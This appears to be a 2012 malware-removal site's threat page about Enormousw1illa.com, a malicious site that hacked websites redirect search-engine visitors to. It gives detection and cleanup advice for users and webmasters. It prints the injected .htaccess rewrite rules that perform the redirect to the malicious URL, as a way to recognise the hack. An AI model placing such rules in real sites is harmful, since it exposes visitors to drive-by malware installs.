Home Malware Programs Browser Hijackers Enormousw1illa.com

Enormousw1illa.com

Posted: February 3, 2012

Enormousw1illa.com is a malicious website that's been used as a destination page for a series of unrelated sites that were compromised to serve as unwitting redirection agents. Any attempt to load these pages from a popular search engine (such as Yahoo Search) will cause Enormousw1illa.com to load instead, which may place you in danger of drive-by-download attacks and other forms of propagation for various PC threats. SpywareRemove.com malware experts advise you to scan your computer after any contact with Enormousw1illa.com due to its confirmed history of malicious software distribution. You also may wish to notify the web master of the compromised site in question so that steps can be taken to remove the .htaccess file-based exploit.

Enormousw1illa.com – an Enormous Danger to Both Your Browser and Your Favorite Website

Enormousw1illa.com shares its IP address with similar sites that have also been guilty of the same type of attacks as Enormousw1illa.com itself. These include sokoloperkovuskeci.com, sweepstakesandcontestsdo.com, sweepstakesandcontestsnow.com, sweepstakesandcontestsinfo.com and infoitpoweringgathering.com, all of which have been confirmed to both distribute harmful software and be promoted by website hacks. Unlike infections that are caused by web browser hijackers (like the Google Redirect Virus), redirect attacks to Enormousw1illa.com and similar sites are caused by hacked websites that have had redirection code inserted into them without the consent of their web masters. Malicious code may be inserted into PHP files and other locations repetitively and may require extensive effort to remove manually – although SpywareRemove.com malware researchers have found that tools for automated removal of this code also exist, albeit, so far, only for outdated versions of the hack.

You can recognize redirect code for Enormousw1illa.com by looking for text that's similar to the following:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]

Because this code checks the referrer website to trigger the redirect for visitors who access it from popular search engines, accessing these sites from other locations and by other methods (such as a bookmark) will not trigger this version of the redirect to Enormousw1illa.com, and webmasters may, thus, remain unaware of the alteration to their site's code for some time. Contact with Enormousw1illa.com and related sites has been known to be disease vectors for malicious software, and SpywareRemove.com malware analysts always advise you to consider your PC potentially infected after contact with Enormousw1illa.com.

Protecting Yourself from the Consequences of the Enormousw1illa.com Hacking Spree

Enormousw1illa.com has already been blocked by several sources, including Google, but other search engines and sources of exposure to Enormousw1illa.com may still be open. Enormousw1illa.com itself has been confirmed by recent reports to still propagate PC threats, and SpywareRemove.com malware researchers emphasize the possibility of both automatic installations via drive-by-downloads and manual installation scams that use mislabeled .exe files. PC threats from Enormousw1illa.com and its fellow sites have been known to be disguised as fake Adobe Flash updates, and you should always take care to acquire software updates from legitimate sources. If believe that Enormousw1illa.com has installed a virus, Trojan or other type of harmful software onto your PC, you should strongly consider removing Enormousw1illa.com with a suitable anti-malware product.

Sites that have been compromised by Enormousw1illa.com redirects include red66.com, thecentsiblelife.com and mieszkanielondyn.com, amongst hundreds of others. As a webmaster, you can prevent your site from falling victim to these hacks by monitoring your website's .htaccess files to scour out any possibility of inserted code regularly, and if you believe that a domain's web master is unaware of the alteration to his site, it's recommended that you notify him so that appropriate actions can be taken.

Technical Details

Additional Information

The following URL's were detected:
enormousw1illa.com/nl-in.php?nnn=556

One Comment

  • Isabel Balderree says:

    My wife clicked an ad and it instantly installed one of the worst viruses I know of. They completely got by my Avast free scanner. Which is kind of scary because it has worked so well prior to now. Are there any ideas?

Loading...